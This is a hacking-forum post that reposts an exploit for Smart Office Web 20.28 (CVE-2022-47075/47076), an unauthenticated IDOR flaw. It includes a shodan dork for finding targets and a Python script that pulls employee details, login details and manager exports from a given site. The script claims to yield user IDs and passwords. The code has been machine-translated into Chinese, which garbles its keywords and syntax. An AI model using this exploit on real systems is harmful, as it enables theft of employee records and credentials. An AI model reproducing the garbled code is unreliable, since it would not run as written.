H

Smart Office Web 20.28-远程信息披露(未经身份验证)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: Smart Office Web 20.28-远程信息披露(未经身份验证)
#shodan dork3: inurl3:'3https://www.shodan.io/search?query?query=smart+office'
#date: 09/dec/2022
#漏洞作者: tejas nitin pingulkar(https://cvewalkthrough.com/)
#供应商HomePage: https://smartofficepayroll.com/
#软件link: https://smartofficepayroll.com/Downloads
#版本: Smart Office Web 20.28和之前
#CVE编号: CVE-2022-47075和CVE-2022-47076
#CVSS : 7.5(高)
#参考: https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-CVE-2022-47075/
#漏洞描述:
#Smart Office Web 20.28及以前允许通过不安全的直接对象参考(IDOR)进行远程信息披露(未经身份验证)。这是在稍后版本中修复的,除了导出ExporteSporeedetails。
导入wget
导入操作系统
从Colorama进口,风格
def download_file(url,文件名):
wget.download(url,文件名)
#disclaimer
print(fore.yellow +'免责声明:此脚本仅用于教育目的。')
打印(“作者对任何未经授权的用法都不承担任何责任。”)
打印(“请使用此脚本负责并遵守法律和道德准则。”)
同意=输入('您同意免责声明吗?(1=是,0=否):')
如果同意!='1':
打印(“您选择不同意。退出脚本。”)
出口()
#红色打印名称
name='tejas nitin pingulkar的利用'
打印(fore.red +名称)
打印(style.Reset_all)#重置颜色
网站=输入('Enter URL [https://1.1.1.1.1.1:1111或http://1.1.1] :')
target_version=输入('目标软件版本20.28或更高版本?(1=是,0=否):')
folder_name=input('输入文件夹名称以保存文件:')
#创建文件夹如果不存在
如果不是OS.PATH.EXISTS(folder_name):
OS.Makedirs(folder_name)
urls_filenames=[]
如果target_version=='1':
urls_filenames.append((网站+ +'/exportEmporteedEedeedeedeedeeds.aspx?actionName=exportemportemployeothereotherdetails','exportEmporteMployeeotherDetails.csv')))
其他:
urls_filenames.extend([
(网站+'/exportEmployeedetails.aspx?actionname=exportemployeedeedetails','exporteMployeedEedetails.csv'),),
(网站+'/displayParallellogData.aspx','displayParallellogData.txt'),),
(网站+'/exportreportingmanager.aspx','exportrePortingManager.csv'),),
(网站+'/exportemployeelogIndetails.aspx','exportEmployeelogIndetails.csv')
)))
打印('CVE-2022-47076:从下载源获取用户ID和密码')
对于URL,urls_filenames:中的文件名
download_file(url,os.path.join(folder_name,filename))
#print'要获得更多有趣的利用,请访问cvewalkthrough.com'
打印(fore.red +'\ n对于更多有趣的利用,请访问cvewalkthrough.com')
打印(style.Reset_all)#重置颜色
 
后退
顶部